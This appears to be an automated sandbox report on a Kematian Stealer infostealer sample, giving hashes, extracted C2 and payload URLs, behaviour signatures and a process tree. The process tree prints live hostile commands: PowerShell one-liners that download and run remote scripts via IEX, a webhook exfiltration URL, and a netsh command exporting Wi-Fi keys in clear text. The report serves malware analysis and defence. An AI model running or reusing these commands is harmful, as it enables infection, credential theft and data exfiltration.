Analysis
Max time kernel: 150s
Max time network: 151s
Platform: windows10-2004_x64
Resource: win10v2004-20240709-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 14/07/2024, 23:10

Static task: static1
Behavioral task: behavioral1 (sample: main (1).exe; resource: win7-20240705-en)
Behavioral task: behavioral2 (sample: main (1).exe; resource: win10v2004-20240709-en)
General
Target: main (1).exe
Size: 89KB
MD5: 755ee27c14914293c29ce91be08c20df
SHA1: cd4b0c9f25261d59689416734f9495a0c30bde17
SHA256: f57315d9f70cab67669c23e10b081aac70f336369605d8c5e3079411f61e36de
SHA512: a250ef4af67d0b5cb4d671ae72f689fcfc4704c0ce99768a7408e0824b1465f9e94e9027f8e6b2855bc0dfe4201deca85333809d34fad617e7ab411c7e10540c
SSDEEP: 1536:R97fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfBweOy:Rp7DhdC6kzWypvaQ0FxyNTBfBt
Malware Config
Extracted: https://full-recording.gl.at.ply.gg:14817/data
Extracted: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
Extracted: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
Signatures
- Blocklisted process makes network request (10 IoCs)
  flow  pid   Process
  2     1128  powershell.exe
  15    1128  powershell.exe
  17    1128  powershell.exe
  23    1412  powershell.exe
  24    1412  powershell.exe
  26    1412  powershell.exe
  28    2256  powershell.exe
  29    2256  powershell.exe
  30    2256  powershell.exe
  32    1128  powershell.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                   Process
  Key value queried  \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation  mshta.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
  flow  ioc
  1     raw.githubusercontent.com
  2     raw.githubusercontent.com
  24    raw.githubusercontent.com
  29    raw.githubusercontent.com
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  16    ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description           ioc                                         Process
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  netsh.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid   Process
  1128  powershell.exe
  1128  powershell.exe
  1128  powershell.exe
  1128  powershell.exe
  1412  powershell.exe
  1412  powershell.exe
  1128  powershell.exe
  1128  powershell.exe
  2256  powershell.exe
  2256  powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                          pid   Process
  Token: SeDebugPrivilege              1128  powershell.exe
  Token: SeIncreaseQuotaPrivilege      1128  powershell.exe
  Token: SeSecurityPrivilege           1128  powershell.exe
  Token: SeTakeOwnershipPrivilege      1128  powershell.exe
  Token: SeLoadDriverPrivilege         1128  powershell.exe
  Token: SeSystemProfilePrivilege      1128  powershell.exe
  Token: SeSystemtimePrivilege         1128  powershell.exe
  Token: SeProfSingleProcessPrivilege  1128  powershell.exe
  Token: SeIncBasePriorityPrivilege    1128  powershell.exe
  Token: SeCreatePagefilePrivilege     1128  powershell.exe
  Token: SeBackupPrivilege             1128  powershell.exe
  Token: SeRestorePrivilege            1128  powershell.exe
  Token: SeShutdownPrivilege           1128  powershell.exe
  Token: SeDebugPrivilege              1128  powershell.exe
  Token: SeSystemEnvironmentPrivilege  1128  powershell.exe
  Token: SeRemoteShutdownPrivilege     1128  powershell.exe
  Token: SeUndockPrivilege             1128  powershell.exe
  Token: SeManageVolumePrivilege       1128  powershell.exe
  Token: 33                            1128  powershell.exe
  Token: 34                            1128  powershell.exe
  Token: 35                            1128  powershell.exe
  Token: 36                            1128  powershell.exe
  The 21-entry block from Token: SeIncreaseQuotaPrivilege through Token: 36 appears a further two times in the report, each time for pid 1128 powershell.exe, giving 64 IoCs in total.
- Suspicious use of WriteProcessMemory (16 IoCs)
  description                     pid   Process         procid_target
  PID 3724 wrote to memory of 4884  3724  main (1).exe    85
  PID 3724 wrote to memory of 4884  3724  main (1).exe    85
  PID 4884 wrote to memory of 2600  4884  cmd.exe         86
  PID 4884 wrote to memory of 2600  4884  cmd.exe         86
  PID 2600 wrote to memory of 3508  2600  net.exe         87
  PID 2600 wrote to memory of 3508  2600  net.exe         87
  PID 4884 wrote to memory of 456   4884  cmd.exe         88
  PID 4884 wrote to memory of 456   4884  cmd.exe         88
  PID 456 wrote to memory of 1128   456   mshta.exe       90
  PID 456 wrote to memory of 1128   456   mshta.exe       90
  PID 1128 wrote to memory of 3148  1128  powershell.exe  96
  PID 1128 wrote to memory of 3148  1128  powershell.exe  96
  PID 1128 wrote to memory of 1412  1128  powershell.exe  97
  PID 1128 wrote to memory of 1412  1128  powershell.exe  97
  PID 1128 wrote to memory of 2256  1128  powershell.exe  98
  PID 1128 wrote to memory of 2256  1128  powershell.exe  98
Processes (indentation shows parent/child relationship)

C:\Users\Admin\AppData\Local\Temp\main (1).exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\main (1).exe"
  PID: 3724
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat "C:\Users\Admin\AppData\Local\Temp\main (1).exe""
    PID: 4884
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net.exe
      Command line: net session
      PID: 2600
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 session
        PID: 3508

    C:\Windows\system32\mshta.exe
      Command line: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex",0))
      PID: 456
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex
        PID: 1128
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\netsh.exe
          Command line: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear
          PID: 3148
          - Event Triggered Execution: Netsh Helper DLL

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
          PID: 1412
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
          PID: 2256
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads